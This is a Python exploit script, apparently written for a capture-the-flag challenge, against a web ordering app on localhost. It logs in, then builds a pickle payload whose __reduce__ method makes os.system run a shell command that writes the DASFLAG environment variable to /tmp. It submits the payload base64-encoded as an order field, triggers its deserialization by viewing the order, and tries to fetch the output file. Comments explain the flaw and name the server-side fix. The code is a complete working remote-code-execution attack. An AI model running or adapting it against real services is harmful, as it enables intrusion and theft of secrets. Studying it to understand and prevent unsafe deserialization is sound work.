import pickle
import base64
import requests
import os
import time

url = "http://localhost:42550"

# Step 1: log in. A requests.Session keeps the cookies the server sets, so the
# later requests in this script are sent with the same session cookie.
session = requests.Session()
credentials = {'username': 'test', 'password': 'test'}
login_response = session.post(url + "/login", data=credentials)

# Success is inferred only from the cookie jar being non-empty; the status
# code and body of login_response are not inspected.
if session.cookies.get_dict():
    login_status = "成功"
else:
    login_status = "失败"
print("登录状态:", login_status)

# Step 2: build the malicious order
class RCE:
    """Object whose pickled form names a callable for the unpickler to invoke.

    pickle consults ``__reduce__`` when serialising and records the returned
    ``(callable, args)`` pair; a process that later unpickles those bytes
    calls ``callable(*args)``. This is why ``pickle.loads`` must never be
    given bytes that a client can control.
    """

    def __reduce__(self):
        # Shell command carried in the pickle: write the DASFLAG environment
        # variable to a file under /tmp.
        command = 'echo $DASFLAG > /tmp/flag_output.txt'
        return (os.system, (command,))

# Serialise the object and base64-encode it so it can travel as a form field.
payload = pickle.dumps(RCE())
encoded_payload = base64.b64encode(payload)
order_data = encoded_payload.decode()
print(f"Payload 长度: {len(order_data)}")

# Submit the encoded blob as the order body; the response is printed verbatim.
order_form = {'order_data': order_data}
response = session.post(url + "/create_order", data=order_form)
print("创建订单响应:", response.text)

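if response.status_code == 200:
    # The create_order response is expected to be JSON with an 'order_id' key.
    order_id = response.json()['order_id']
    print(f"订单ID: {order_id}")

    # Step 3: request the order page. The script's premise is that the server
    # deserialises the stored order_data when the order is viewed; the server
    # code is not shown here. The server-side remedy is to stop unpickling
    # client-supplied bytes and use a data-only format such as JSON.
    time.sleep(1)
    view_response = session.get(f"{url}/view_order/{order_id}")
    print("查看订单状态码:", view_response.status_code)

    # Step 4: check whether the output file can be fetched. Whether the
    # application serves that file under /static is not visible from this
    # script. A non-200 reply does not raise, so the printed body may be an
    # error page.
    time.sleep(1)
    try:
        flag_response = session.get(f"{url}/static/flag_output.txt")
    except requests.RequestException:
        # Catch only transport-level failures; a bare `except:` would also
        # swallow KeyboardInterrupt and unrelated programming errors.
        print("无法读取 flag 文件")
    else:
        print("Flag 内容:", flag_response.text)
else:
    print("创建订单失败")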